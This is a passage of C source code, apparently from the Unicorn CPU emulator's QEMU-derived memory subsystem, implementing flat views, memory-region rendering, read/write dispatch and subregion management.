.offset_within_region = (fr)->offset_in_region, \ + .size = (fr)->addr.size, \ + .offset_within_address_space = int128_get64((fr)->addr.start), \ + .readonly = (fr)->readonly, \ + })) +*/ + +typedef struct FlatRange FlatRange; +typedef struct FlatView FlatView; + +/* Range of memory in the global map. Addresses are absolute. */ +struct FlatRange { + MemoryRegion *mr; + hwaddr offset_in_region; + AddrRange addr; + uint8_t dirty_log_mask; + bool romd_mode; + bool readonly; +}; + +/* Flattened global view of current active memory hierarchy. Kept in sorted + * order. + */ +struct FlatView { + unsigned ref; + FlatRange *ranges; + unsigned nr; + unsigned nr_allocated; +}; + +typedef struct AddressSpaceOps AddressSpaceOps; + +#define FOR_EACH_FLAT_RANGE(var, view) \ + for (var = (view)->ranges; var < (view)->ranges + (view)->nr; ++var) + +static bool flatrange_equal(FlatRange *a, FlatRange *b) +{ + return a->mr == b->mr + && addrrange_equal(a->addr, b->addr) + && a->offset_in_region == b->offset_in_region + && a->romd_mode == b->romd_mode + && a->readonly == b->readonly; +} + +static void flatview_init(FlatView *view) +{ + view->ref = 1; + view->ranges = NULL; + view->nr = 0; + view->nr_allocated = 0; +} + +/* Insert a range into a given position. Caller is responsible for maintaining + * sorting order. + */ +static void flatview_insert(FlatView *view, unsigned pos, FlatRange *range) +{ + if (view->nr == view->nr_allocated) { + view->nr_allocated = MAX(2 * view->nr, 10); + view->ranges = g_realloc(view->ranges, + view->nr_allocated * sizeof(*view->ranges)); + } + memmove(view->ranges + pos + 1, view->ranges + pos, + (view->nr - pos) * sizeof(FlatRange)); + view->ranges[pos] = *range; + memory_region_ref(range->mr); + ++view->nr; +} + +static void flatview_destroy(FlatView *view) +{ + int i; + + for (i = 0; i < view->nr; i++) { + memory_region_unref(view->ranges[i].mr); + } + g_free(view->ranges); + g_free(view); +} + +static void flatview_ref(FlatView *view) +{ + atomic_inc(&view->ref); +} + +static void flatview_unref(FlatView *view) +{ + if (atomic_fetch_dec(&view->ref) == 1) { + flatview_destroy(view); + } +} + +static bool can_merge(FlatRange *r1, FlatRange *r2) +{ + return int128_eq(addrrange_end(r1->addr), r2->addr.start) + && r1->mr == r2->mr + && int128_eq(int128_add(int128_make64(r1->offset_in_region), + r1->addr.size), + int128_make64(r2->offset_in_region)) + && r1->dirty_log_mask == r2->dirty_log_mask + && r1->romd_mode == r2->romd_mode + && r1->readonly == r2->readonly; +} + +/* Attempt to simplify a view by merging adjacent ranges */ +static void flatview_simplify(FlatView *view) +{ + unsigned i, j; + + i = 0; + while (i < view->nr) { + j = i + 1; + while (j < view->nr + && can_merge(&view->ranges[j-1], &view->ranges[j])) { + int128_addto(&view->ranges[i].addr.size, view->ranges[j].addr.size); + ++j; + } + ++i; + memmove(&view->ranges[i], &view->ranges[j], + (view->nr - j) * sizeof(view->ranges[j])); + view->nr -= j - i; + } +} + +static bool memory_region_big_endian(MemoryRegion *mr) +{ +#ifdef TARGET_WORDS_BIGENDIAN + return mr->ops->endianness != DEVICE_LITTLE_ENDIAN; +#else + return mr->ops->endianness == DEVICE_BIG_ENDIAN; +#endif +} + +static bool memory_region_wrong_endianness(MemoryRegion *mr) +{ +#ifdef TARGET_WORDS_BIGENDIAN + return mr->ops->endianness == DEVICE_LITTLE_ENDIAN; +#else + return mr->ops->endianness == DEVICE_BIG_ENDIAN; +#endif +} + +static void adjust_endianness(MemoryRegion *mr, uint64_t *data, unsigned size) +{ + if (memory_region_wrong_endianness(mr)) { + switch (size) { + case 1: + break; + case 2: + *data = bswap16(*data); + break; + case 4: + *data = bswap32(*data); + break; + case 8: + *data = bswap64(*data); + break; + default: + abort(); + } + } +} + +static void memory_region_oldmmio_read_accessor(MemoryRegion *mr, + hwaddr addr, + uint64_t *value, + unsigned size, + unsigned shift, + uint64_t mask) +{ + uint64_t tmp; + + tmp = mr->ops->old_mmio.read[ctz32(size)](mr->opaque, addr); + *value |= (tmp & mask) << shift; +} + +static void memory_region_read_accessor(MemoryRegion *mr, + hwaddr addr, + uint64_t *value, + unsigned size, + unsigned shift, + uint64_t mask) +{ + uint64_t tmp; + + tmp = mr->ops->read(mr->uc, mr->opaque, addr, size); + *value |= (tmp & mask) << shift; +} + +static void memory_region_oldmmio_write_accessor(MemoryRegion *mr, + hwaddr addr, + uint64_t *value, + unsigned size, + unsigned shift, + uint64_t mask) +{ + uint64_t tmp; + + tmp = (*value >> shift) & mask; + mr->ops->old_mmio.write[ctz32(size)](mr->opaque, addr, tmp); +} + +static void memory_region_write_accessor(MemoryRegion *mr, + hwaddr addr, + uint64_t *value, + unsigned size, + unsigned shift, + uint64_t mask) +{ + uint64_t tmp; + + tmp = (*value >> shift) & mask; + mr->ops->write(mr->uc, mr->opaque, addr, tmp, size); +} + +static void access_with_adjusted_size(hwaddr addr, + uint64_t *value, + unsigned size, + unsigned access_size_min, + unsigned access_size_max, + void (*access)(MemoryRegion *mr, + hwaddr addr, + uint64_t *value, + unsigned size, + unsigned shift, + uint64_t mask), + MemoryRegion *mr) +{ + uint64_t access_mask; + unsigned access_size; + unsigned i; + + if (!access_size_min) { + access_size_min = 1; + } + if (!access_size_max) { + access_size_max = 4; + } + + /* FIXME: support unaligned access? */ + access_size = MAX(MIN(size, access_size_max), access_size_min); + access_mask = (0-1ULL) >> (64 - access_size * 8); + if (memory_region_big_endian(mr)) { + for (i = 0; i < size; i += access_size) { + access(mr, addr + i, value, access_size, + (size - access_size - i) * 8, access_mask); + } + } else { + for (i = 0; i < size; i += access_size) { + access(mr, addr + i, value, access_size, i * 8, access_mask); + } + } +} + +static AddressSpace *memory_region_to_address_space(MemoryRegion *mr) +{ + AddressSpace *as; + + while (mr->container) { + mr = mr->container; + } + QTAILQ_FOREACH(as, &mr->uc->address_spaces, address_spaces_link) { + if (mr == as->root) { + return as; + } + } + return NULL; +} + +/* Render a memory region into the global view. Ranges in @view obscure + * ranges in @mr. + */ +static void render_memory_region(FlatView *view, + MemoryRegion *mr, + Int128 base, + AddrRange clip, + bool readonly) +{ + MemoryRegion *subregion; + unsigned i; + hwaddr offset_in_region; + Int128 remain; + Int128 now; + FlatRange fr; + AddrRange tmp; + + if (!mr->enabled) { + return; + } + + int128_addto(&base, int128_make64(mr->addr)); + readonly |= mr->readonly; + + tmp = addrrange_make(base, mr->size); + + if (!addrrange_intersects(tmp, clip)) { + return; + } + + clip = addrrange_intersection(tmp, clip); + + if (mr->alias) { + int128_subfrom(&base, int128_make64(mr->alias->addr)); + int128_subfrom(&base, int128_make64(mr->alias_offset)); + render_memory_region(view, mr->alias, base, clip, readonly); + return; + } + + /* Render subregions in priority order. */ + QTAILQ_FOREACH(subregion, &mr->subregions, subregions_link) { + render_memory_region(view, subregion, base, clip, readonly); + } + + if (!mr->terminates) { + return; + } + + offset_in_region = int128_get64(int128_sub(clip.start, base)); + base = clip.start; + remain = clip.size; + + fr.mr = mr; + fr.dirty_log_mask = mr->dirty_log_mask; + fr.romd_mode = mr->romd_mode; + fr.readonly = readonly; + + /* Render the region itself into any gaps left by the current view. */ + for (i = 0; i < view->nr && int128_nz(remain); ++i) { + if (int128_ge(base, addrrange_end(view->ranges[i].addr))) { + continue; + } + if (int128_lt(base, view->ranges[i].addr.start)) { + now = int128_min(remain, + int128_sub(view->ranges[i].addr.start, base)); + fr.offset_in_region = offset_in_region; + fr.addr = addrrange_make(base, now); + flatview_insert(view, i, &fr); + ++i; + int128_addto(&base, now); + offset_in_region += int128_get64(now); + int128_subfrom(&remain, now); + } + now = int128_sub(int128_min(int128_add(base, remain), + addrrange_end(view->ranges[i].addr)), + base); + int128_addto(&base, now); + offset_in_region += int128_get64(now); + int128_subfrom(&remain, now); + } + if (int128_nz(remain)) { + fr.offset_in_region = offset_in_region; + fr.addr = addrrange_make(base, remain); + flatview_insert(view, i, &fr); + } +} + +/* Render a memory topology into a list of disjoint absolute ranges. */ +static FlatView *generate_memory_topology(MemoryRegion *mr) +{ + FlatView *view; + + view = g_new(FlatView, 1); + flatview_init(view); + + if (mr) { + render_memory_region(view, mr, int128_zero(), + addrrange_make(int128_zero(), int128_2_64()), false); + } + flatview_simplify(view); + + return view; +} + +static FlatView *address_space_get_flatview(AddressSpace *as) +{ + FlatView *view; + + view = as->current_map; + flatview_ref(view); + return view; +} + +static void address_space_update_topology_pass(AddressSpace *as, + const FlatView *old_view, + const FlatView *new_view, + bool adding) +{ + unsigned iold, inew; + FlatRange *frold, *frnew; + struct uc_struct *uc = as->uc; + + /* Generate a symmetric difference of the old and new memory maps. + * Kill ranges in the old map, and instantiate ranges in the new map. + */ + iold = inew = 0; + while (iold < old_view->nr || inew < new_view->nr) { + if (iold < old_view->nr) { + frold = &old_view->ranges[iold]; + } else { + frold = NULL; + } + if (inew < new_view->nr) { + frnew = &new_view->ranges[inew]; + } else { + frnew = NULL; + } + + if (frold + && (!frnew + || int128_lt(frold->addr.start, frnew->addr.start) + || (int128_eq(frold->addr.start, frnew->addr.start) + && !flatrange_equal(frold, frnew)))) { + /* In old but not in new, or in both but attributes changed. */ + + if (!adding) { + MEMORY_LISTENER_UPDATE_REGION(frold, as, Reverse, region_del); + } + + ++iold; + } else if (frold && frnew && flatrange_equal(frold, frnew)) { + /* In both and unchanged (except logging may have changed) */ + + if (adding) { + MEMORY_LISTENER_UPDATE_REGION(frnew, as, Forward, region_nop); + if (frold->dirty_log_mask && !frnew->dirty_log_mask) { + MEMORY_LISTENER_UPDATE_REGION(frnew, as, Reverse, log_stop); + } else if (frnew->dirty_log_mask && !frold->dirty_log_mask) { + MEMORY_LISTENER_UPDATE_REGION(frnew, as, Forward, log_start); + } + } + + ++iold; + ++inew; + } else { + /* In new */ + + if (adding) { + MEMORY_LISTENER_UPDATE_REGION(frnew, as, Forward, region_add); + } + + ++inew; + } + } +} + + +static void address_space_update_topology(AddressSpace *as) +{ + FlatView *old_view = address_space_get_flatview(as); + FlatView *new_view = generate_memory_topology(as->root); + + address_space_update_topology_pass(as, old_view, new_view, false); + address_space_update_topology_pass(as, old_view, new_view, true); + + flatview_unref(as->current_map); + as->current_map = new_view; + + /* Note that all the old MemoryRegions are still alive up to this + * point. This relieves most MemoryListeners from the need to + * ref/unref the MemoryRegions they get---unless they use them + * outside the iothread mutex, in which case precise reference + * counting is necessary. + */ + flatview_unref(old_view); +} + +void memory_region_transaction_begin(struct uc_struct *uc) +{ + ++uc->memory_region_transaction_depth; +} + +static void memory_region_clear_pending(struct uc_struct *uc) +{ + uc->memory_region_update_pending = false; +} + +void memory_region_transaction_commit(struct uc_struct *uc) +{ + AddressSpace *as; + + assert(uc->memory_region_transaction_depth); + --uc->memory_region_transaction_depth; + if (!uc->memory_region_transaction_depth) { + if (uc->memory_region_update_pending) { + MEMORY_LISTENER_CALL_GLOBAL(begin, Forward); + + QTAILQ_FOREACH(as, &uc->address_spaces, address_spaces_link) { + address_space_update_topology(as); + } + + MEMORY_LISTENER_CALL_GLOBAL(commit, Forward); + } + memory_region_clear_pending(uc); + } +} + +static void memory_region_destructor_none(MemoryRegion *mr) +{ +} + +static void memory_region_destructor_ram(MemoryRegion *mr) +{ + qemu_ram_free(mr->uc, mr->ram_addr); +} + +static void memory_region_destructor_alias(MemoryRegion *mr) +{ + memory_region_unref(mr->alias); +} + +static void memory_region_destructor_ram_from_ptr(MemoryRegion *mr) +{ + qemu_ram_free_from_ptr(mr->uc, mr->ram_addr); +} + +static bool memory_region_need_escape(char c) +{ + return c == '/' || c == '[' || c == '\\' || c == ']'; +} + +static char *memory_region_escape_name(const char *name) +{ + const char *p; + char *escaped, *q; + uint8_t c; + size_t bytes = 0; + + for (p = name; *p; p++) { + bytes += memory_region_need_escape(*p) ? 4 : 1; + } + if (bytes == p - name) { + return g_memdup(name, bytes + 1); + } + + escaped = g_malloc(bytes + 1); + for (p = name, q = escaped; *p; p++) { + c = *p; + if (unlikely(memory_region_need_escape(c))) { + *q++ = '\\'; + *q++ = 'x'; + *q++ = "0123456789abcdef"[c >> 4]; + c = "0123456789abcdef"[c & 15]; + } + *q++ = c; + } + *q = 0; + return escaped; +} + +void memory_region_init(struct uc_struct *uc, MemoryRegion *mr, + Object *owner, + const char *name, + uint64_t size) +{ + if (!owner) { + owner = qdev_get_machine(uc); + uc->owner = owner; + } + + object_initialize(uc, mr, sizeof(*mr), TYPE_MEMORY_REGION); + mr->uc = uc; + mr->size = int128_make64(size); + if (size == UINT64_MAX) { + mr->size = int128_2_64(); + } + mr->name = g_strdup(name); + + if (name) { + char *escaped_name = memory_region_escape_name(name); + char *name_array = g_strdup_printf("%s[*]", escaped_name); + object_property_add_child(owner, name_array, OBJECT(mr), &error_abort); + object_unref(uc, OBJECT(mr)); + g_free(name_array); + g_free(escaped_name); + } +} + +static void memory_region_get_addr(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + MemoryRegion *mr = MEMORY_REGION(uc, obj); + uint64_t value = mr->addr; + + visit_type_uint64(v, &value, name, errp); +} + +static void memory_region_get_container(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + MemoryRegion *mr = MEMORY_REGION(uc, obj); + gchar *path = (gchar *)""; + + if (mr->container) { + path = object_get_canonical_path(OBJECT(mr->container)); + } + visit_type_str(v, &path, name, errp); + if (mr->container) { + g_free(path); + } +} + +static Object *memory_region_resolve_container(struct uc_struct *uc, Object *obj, void *opaque, + const char *part) +{ + MemoryRegion *mr = MEMORY_REGION(uc, obj); + + return OBJECT(mr->container); +} + +static void memory_region_get_priority(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + MemoryRegion *mr = MEMORY_REGION(uc, obj); + int32_t value = mr->priority; + + visit_type_int32(v, &value, name, errp); +} + +static bool memory_region_get_may_overlap(struct uc_struct *uc, Object *obj, Error **errp) +{ + MemoryRegion *mr = MEMORY_REGION(uc, obj); + + return mr->may_overlap; +} + +static void memory_region_get_size(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + MemoryRegion *mr = MEMORY_REGION(uc, obj); + uint64_t value = memory_region_size(mr); + + visit_type_uint64(v, &value, name, errp); +} + +static void memory_region_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + MemoryRegion *mr = MEMORY_REGION(uc, obj); + ObjectProperty *op; + + mr->ops = &unassigned_mem_ops; + mr->enabled = true; + mr->romd_mode = true; + mr->destructor = memory_region_destructor_none; + QTAILQ_INIT(&mr->subregions); + + op = object_property_add(OBJECT(mr), "container", + "link<" TYPE_MEMORY_REGION ">", + memory_region_get_container, + NULL, /* memory_region_set_container */ + NULL, NULL, &error_abort); + op->resolve = memory_region_resolve_container; + + object_property_add(OBJECT(mr), "addr", "uint64", + memory_region_get_addr, + NULL, /* memory_region_set_addr */ + NULL, NULL, &error_abort); + object_property_add(OBJECT(mr), "priority", "uint32", + memory_region_get_priority, + NULL, /* memory_region_set_priority */ + NULL, NULL, &error_abort); + object_property_add_bool(mr->uc, OBJECT(mr), "may-overlap", + memory_region_get_may_overlap, + NULL, /* memory_region_set_may_overlap */ + &error_abort); + object_property_add(OBJECT(mr), "size", "uint64", + memory_region_get_size, + NULL, /* memory_region_set_size, */ + NULL, NULL, &error_abort); +} + +static uint64_t unassigned_mem_read(struct uc_struct* uc, hwaddr addr, unsigned size) +{ +#ifdef DEBUG_UNASSIGNED + printf("Unassigned mem read " TARGET_FMT_plx "\n", addr); +#endif + if (uc->current_cpu != NULL) { + cpu_unassigned_access(uc->current_cpu, addr, false, false, 0, size); + } + return 0; +} + +static void unassigned_mem_write(struct uc_struct* uc, hwaddr addr, + uint64_t val, unsigned size) +{ +#ifdef DEBUG_UNASSIGNED + printf("Unassigned mem write " TARGET_FMT_plx " = 0x%"PRIx64"\n", addr, val); +#endif + if (uc->current_cpu != NULL) { + cpu_unassigned_access(uc->current_cpu, addr, true, false, 0, size); + } +} + +static bool unassigned_mem_accepts(void *opaque, hwaddr addr, + unsigned size, bool is_write) +{ + return false; +} + +const MemoryRegionOps unassigned_mem_ops = { + NULL, + NULL, + + DEVICE_NATIVE_ENDIAN, + + {0,0,false,unassigned_mem_accepts}, +}; + +bool memory_region_access_valid(MemoryRegion *mr, + hwaddr addr, + unsigned size, + bool is_write) +{ + int access_size_min, access_size_max; + int access_size, i; + + if (!mr->ops->valid.unaligned && (addr & (size - 1))) { + return false; + } + + if (!mr->ops->valid.accepts) { + return true; + } + + access_size_min = mr->ops->valid.min_access_size; + if (!mr->ops->valid.min_access_size) { + access_size_min = 1; + } + + access_size_max = mr->ops->valid.max_access_size; + if (!mr->ops->valid.max_access_size) { + access_size_max = 4; + } + + access_size = MAX(MIN(size, access_size_max), access_size_min); + for (i = 0; i < size; i += access_size) { + if (!mr->ops->valid.accepts(mr->opaque, addr + i, access_size, + is_write)) { + return false; + } + } + + return true; +} + +static uint64_t memory_region_dispatch_read1(MemoryRegion *mr, + hwaddr addr, + unsigned size) +{ + uint64_t data = 0; + + if (mr->ops->read) { + access_with_adjusted_size(addr, &data, size, + mr->ops->impl.min_access_size, + mr->ops->impl.max_access_size, + memory_region_read_accessor, mr); + } else { + access_with_adjusted_size(addr, &data, size, 1, 4, + memory_region_oldmmio_read_accessor, mr); + } + + return data; +} + +static bool memory_region_dispatch_read(MemoryRegion *mr, + hwaddr addr, + uint64_t *pval, + unsigned size) +{ + if (!memory_region_access_valid(mr, addr, size, false)) { + *pval = unassigned_mem_read(mr->uc, addr, size); + return true; + } + + *pval = memory_region_dispatch_read1(mr, addr, size); + adjust_endianness(mr, pval, size); + return false; +} + +static bool memory_region_dispatch_write(MemoryRegion *mr, + hwaddr addr, + uint64_t data, + unsigned size) +{ + if (!memory_region_access_valid(mr, addr, size, true)) { + unassigned_mem_write(mr->uc, addr, data, size); + return true; + } + + adjust_endianness(mr, &data, size); + + if (mr->ops->write) { + access_with_adjusted_size(addr, &data, size, + mr->ops->impl.min_access_size, + mr->ops->impl.max_access_size, + memory_region_write_accessor, mr); + } else { + access_with_adjusted_size(addr, &data, size, 1, 4, + memory_region_oldmmio_write_accessor, mr); + } + return false; +} + +void memory_region_init_io(struct uc_struct *uc, MemoryRegion *mr, + Object *owner, + const MemoryRegionOps *ops, + void *opaque, + const char *name, + uint64_t size) +{ + memory_region_init(uc, mr, owner, name, size); + mr->ops = ops; + mr->opaque = opaque; + mr->terminates = true; + mr->ram_addr = ~(ram_addr_t)0; +} + +void memory_region_init_ram(struct uc_struct *uc, MemoryRegion *mr, + Object *owner, + const char *name, + uint64_t size, + uint32_t perms, + Error **errp) +{ + memory_region_init(uc, mr, owner, name, size); + mr->ram = true; + if (!(perms & UC_PROT_WRITE)) { + mr->readonly = true; + } + mr->perms = perms; + mr->terminates = true; + mr->destructor = memory_region_destructor_ram; + mr->ram_addr = qemu_ram_alloc(size, mr, errp); +} + +void memory_region_init_ram_ptr(struct uc_struct *uc, MemoryRegion *mr, + Object *owner, + const char *name, + uint64_t size, + void *ptr) +{ + memory_region_init(uc, mr, owner, name, size); + mr->ram = true; + mr->terminates = true; + mr->destructor = memory_region_destructor_ram_from_ptr; + + /* qemu_ram_alloc_from_ptr cannot fail with ptr != NULL. */ + assert(ptr != NULL); + mr->ram_addr = qemu_ram_alloc_from_ptr(size, ptr, mr, &error_abort); +} + +void memory_region_set_skip_dump(MemoryRegion *mr) +{ + mr->skip_dump = true; +} + +void memory_region_init_alias(struct uc_struct *uc, MemoryRegion *mr, + Object *owner, + const char *name, + MemoryRegion *orig, + hwaddr offset, + uint64_t size) +{ + memory_region_init(uc, mr, owner, name, size); + memory_region_ref(orig); + mr->destructor = memory_region_destructor_alias; + mr->alias = orig; + mr->alias_offset = offset; +} + +void memory_region_init_reservation(struct uc_struct *uc, MemoryRegion *mr, + Object *owner, + const char *name, + uint64_t size) +{ + memory_region_init_io(uc, mr, owner, &unassigned_mem_ops, mr, name, size); +} + +static void memory_region_finalize(struct uc_struct *uc, Object *obj, void *opaque) +{ + MemoryRegion *mr = MEMORY_REGION(uc, obj); + + assert(QTAILQ_EMPTY(&mr->subregions)); + // assert(memory_region_transaction_depth == 0); + mr->destructor(mr); + g_free((char *)mr->name); +} + +void memory_region_ref(MemoryRegion *mr) +{ + /* MMIO callbacks most likely will access data that belongs + * to the owner, hence the need to ref/unref the owner whenever + * the memory region is in use. + * + * The memory region is a child of its owner. As long as the + * owner doesn't call unparent itself on the memory region, + * ref-ing the owner will also keep the memory region alive. + * Memory regions without an owner are supposed to never go away, + * but we still ref/unref them for debugging purposes. + */ + Object *obj = OBJECT(mr); + if (obj && obj->parent) { + object_ref(obj->parent); + } else { + object_ref(obj); + } +} + +void memory_region_unref(MemoryRegion *mr) +{ + Object *obj = OBJECT(mr); + if (obj && obj->parent) { + object_unref(mr->uc, obj->parent); + } else { + object_unref(mr->uc, obj); + } +} + +uint64_t memory_region_size(MemoryRegion *mr) +{ + if (int128_eq(mr->size, int128_2_64())) { + return UINT64_MAX; + } + return int128_get64(mr->size); +} + +const char *memory_region_name(const MemoryRegion *mr) +{ + if (!mr->name) { + ((MemoryRegion *)mr)->name = + object_get_canonical_path_component(OBJECT(mr)); + } + return mr->name; +} + +bool memory_region_is_ram(MemoryRegion *mr) +{ + return mr->ram; +} + +bool memory_region_is_skip_dump(MemoryRegion *mr) +{ + return mr->skip_dump; +} + +bool memory_region_is_logging(MemoryRegion *mr) +{ + return mr->dirty_log_mask; +} + +bool memory_region_is_rom(MemoryRegion *mr) +{ + return mr->ram && mr->readonly; +} + +bool memory_region_is_iommu(MemoryRegion *mr) +{ + return mr->iommu_ops != 0; +} + +void memory_region_set_readonly(MemoryRegion *mr, bool readonly) +{ + if (mr->readonly != readonly) { + memory_region_transaction_begin(mr->uc); + mr->readonly = readonly; + if (readonly) { + mr->perms &= ~UC_PROT_WRITE; + } + else { + mr->perms |= UC_PROT_WRITE; + } + mr->uc->memory_region_update_pending |= mr->enabled; + memory_region_transaction_commit(mr->uc); + } +} + +void memory_region_rom_device_set_romd(MemoryRegion *mr, bool romd_mode) +{ + if (mr->romd_mode != romd_mode) { + memory_region_transaction_begin(mr->uc); + mr->romd_mode = romd_mode; + mr->uc->memory_region_update_pending |= mr->enabled; + memory_region_transaction_commit(mr->uc); + } +} + +int memory_region_get_fd(MemoryRegion *mr) +{ + if (mr->alias) { + return memory_region_get_fd(mr->alias); + } + + assert(mr->terminates); + + return qemu_get_ram_fd(mr->uc, mr->ram_addr & TARGET_PAGE_MASK); +} + +void *memory_region_get_ram_ptr(MemoryRegion *mr) +{ + if (mr->alias) { + return (char*)memory_region_get_ram_ptr(mr->alias) + mr->alias_offset; + } + + assert(mr->terminates); + + return qemu_get_ram_ptr(mr->uc, mr->ram_addr & TARGET_PAGE_MASK); +} + +static void memory_region_update_container_subregions(MemoryRegion *subregion) +{ + hwaddr offset = subregion->addr; + MemoryRegion *mr = subregion->container; + MemoryRegion *other; + + memory_region_transaction_begin(mr->uc); + + memory_region_ref(subregion); + QTAILQ_FOREACH(other, &mr->subregions, subregions_link) { + if (subregion->may_overlap || other->may_overlap) { + continue; + } + if (int128_ge(int128_make64(offset), + int128_add(int128_make64(other->addr), other->size)) + || int128_le(int128_add(int128_make64(offset), subregion->size), + int128_make64(other->addr))) { + continue; + } +#if 0 + printf("warning: subregion collision %llx/%llx (%s) " + "vs %llx/%llx (%s)\n", + (unsigned long long)offset, + (unsigned long long)int128_get64(subregion->size), + subregion->name, + (unsigned long long)other->addr, + (unsigned long long)int128_get64(other->size), + other->name); +#endif + } + QTAILQ_FOREACH(other, &mr->subregions, subregions_link) { + if (subregion->priority >= other->priority) { + QTAILQ_INSERT_BEFORE(other, subregion, subregions_link); + goto done; + } + } + QTAILQ_INSERT_TAIL(&mr->subregions, subregion, subregions_link); +done: + mr->uc->memory_region_update_pending |= mr->enabled && subregion->enabled; + memory_region_transaction_commit(mr->uc); +} + +static void memory_region_add_subregion_common(MemoryRegion *mr, + hwaddr offset, + MemoryRegion *subregion) +{ + assert(!subregion->container); + subregion->container = mr; + subregion->addr = offset; + subregion->end = offset + int128_get64(subregion->size); + memory_region_update_container_subregions(subregion); +} + +void memory_region_add_subregion(MemoryRegion *mr, + hwaddr offset, + MemoryRegion *subregion) +{ + subregion->may_overlap = false; + subregion->priority = 0; + memory_region_add_subregion_common(mr, offset, subregion); +} + +void memory_region_add_subregion_overlap(MemoryRegion *mr, + hwaddr offset, + MemoryRegion *subregion, + int priority) +{ + subregion->may_overlap = true; + subregion->priority = priority; + memory_region_add_subregion_common(mr, offset, subregion); +} + +void memory_region_del_subregion(MemoryRegion *mr, + MemoryRegion *subregion) +{ + memory_region_transaction_begin(mr->uc); + assert(subregion->container == mr); + subregion->container = NULL; + QTAILQ_REMOVE(&mr->subregions, subregion, subregions_link); + memory_region_unref(subregion); + mr->uc->memory_region_update_pending |= mr->enabled && subregion->enabled; + memory_region_transaction_commit(mr->uc); +} + +void memory_region_set_enabled(MemoryRegion *mr, bool enabled) +{ + if (enabled == mr->enabled) { + return; + } + memory_region_transaction_begin(mr->uc); + mr->enabled = enabled; + mr->uc->memory_region_update_pending = true; + memory_region_transaction_commit(mr->uc); +} + +static void memory_region_readd_subregion(MemoryRegion *mr) +{ + MemoryRegion *container = mr->container; + + if (container) { + memory_region_transaction_begin(mr->uc); + memory_region_ref(mr); + memory_region_del_subregion(container, mr); + mr->container = container; + memory_region_update_container_subregions(mr); + memory_region_unref(mr); + memory_region_transaction_commit(mr->uc); + } +} + +void memory_region_set_address(MemoryRegion *mr, hwaddr addr) +{ + if (addr != mr->addr) { + mr->addr = addr; + memory_region_readd_subregion(mr); + } +} + +void memory_region_set_alias_offset(MemoryRegion *mr, hwaddr offset) +{ + assert(mr->alias); + + if (offset == mr->alias_offset) { + return; + } + + memory_region_transaction_begin(mr->uc); + mr->alias_offset = offset; + mr->uc->memory_region_update_pending |= mr->enabled; + memory_region_transaction_commit(mr->uc); +} + +ram_addr_t memory_region_get_ram_addr(MemoryRegion *mr) +{ + return mr->ram_addr; +} + +uint64_t memory_region_get_alignment(const MemoryRegion *mr) +{ + return mr->align; +} + +static int cmp_flatrange_addr(const void *addr_, const void *fr_) +{ + const AddrRange *addr = addr_; + const FlatRange *fr = fr_; + + if (int128_le(addrrange_end(*addr), fr->addr.start)) { + return -1; + } else if (int128_ge(addr->start, addrrange_end(fr->addr))) { + return 1; + } + return 0; +} + +static FlatRange *flatview_lookup(FlatView *view, AddrRange addr) +{ + return bsearch(&addr, view->ranges, view->nr, + sizeof(FlatRange), cmp_flatrange_addr); +} + +bool memory_region_present(MemoryRegion *container, hwaddr addr) +{ + MemoryRegion *mr = memory_region_find(container, addr, 1).mr; + if (!mr || (mr == container)) { + return false; + } + memory_region_unref(mr); + return true; +} + +bool memory_region_is_mapped(MemoryRegion *mr) +{ + return mr->container ? true : false; +} + +MemoryRegionSection memory_region_find(MemoryRegion *mr, + hwaddr addr, uint64_t size) +{ + MemoryRegionSection ret = { NULL }; + MemoryRegion *root; + AddressSpace *as; + AddrRange range; + FlatView *view; + FlatRange *fr; + + addr += mr->addr; + for (root = mr; root->container; ) { + root = root->container; + addr += root->addr; + } + + as = memory_region_to_address_space(root); + if (!as) { + return ret; + } + range = addrrange_make(int128_make64(addr), int128_make64(size)); + + view = address_space_get_flatview(as); + fr = flatview_lookup(view, range); + if (!fr) { + flatview_unref(view); + return ret; + } + + while (fr > view->ranges && addrrange_intersects(fr[-1].addr, range)) { + --fr; + } + + ret.mr = fr->mr; + ret.address_space = as; + range = addrrange_intersection(range, fr->addr); + ret.offset_within_region = fr->offset_in_region; + ret.offset_within_region += int128_get64(int128_sub(range.start, + fr->addr.start)); + ret.size = range.size; + ret.offset_within_address_space = int128_get64(range.start); + ret.readonly = fr->readonly; + memory_region_ref(ret.mr); + + flatview_unref(view); + return ret; +} + +static void listener_add_address_space(MemoryListener *listener, + AddressSpace *as) +{ + FlatView *view; + FlatRange *fr; + + if (listener->address_space_filter + && listener->address_space_filter != as) { + return; + } + + if (listener->address_space_filter->uc->global_dirty_log) { + if (listener->log_global_start) { + listener->log_global_start(listener); + } + } + + view = address_space_get_flatview(as); + FOR_EACH_FLAT_RANGE(fr, view) { + MemoryRegionSection section = MemoryRegionSection_make( + fr->mr, + as, + fr->offset_in_region, + fr->addr.size, + int128_get64(fr->addr.start), + fr->readonly); + if (listener->region_add) { + listener->region_add(listener, §ion); + } + } + flatview_unref(view); +} + +void memory_listener_register(struct uc_struct* uc, MemoryListener *listener, AddressSpace *filter) +{ + MemoryListener *other = NULL; + AddressSpace *as; + + listener->address_space_filter = filter; + if (QTAILQ_EMPTY(&uc->memory_listeners) + || listener->priority >= QTAILQ_LAST(&uc->memory_listeners, + memory_listeners)->priority) { + QTAILQ_INSERT_TAIL(&uc->memory_listeners, listener, link); + } else { + QTAILQ_FOREACH(other, &uc->memory_listeners, link) { + if (listener->priority < other->priority) { + break; + } + } + QTAILQ_INSERT_BEFORE(other, listener, link); + } + + QTAILQ_FOREACH(as, &uc->address_spaces, address_spaces_link) { + listener_add_address_space(listener, as); + } +} + +void memory_listener_unregister(struct uc_struct *uc, MemoryListener *listener) +{ + QTAILQ_REMOVE(&uc->memory_listeners, listener, link); +} + +void address_space_init(struct uc_struct *uc, AddressSpace *as, MemoryRegion *root, const char *name) +{ + if (QTAILQ_EMPTY(&uc->address_spaces)) { + memory_init(uc); + } + + memory_region_transaction_begin(uc); + as->uc = uc; + as->root = root; + as->current_map = g_new(FlatView, 1); + flatview_init(as->current_map); + QTAILQ_INSERT_TAIL(&uc->address_spaces, as, address_spaces_link); + as->name = g_strdup(name ? name : "anonymous"); + address_space_init_dispatch(as); + uc->memory_region_update_pending |= root->enabled; + memory_region_transaction_commit(uc); +} + +void address_space_destroy(AddressSpace *as) +{ + 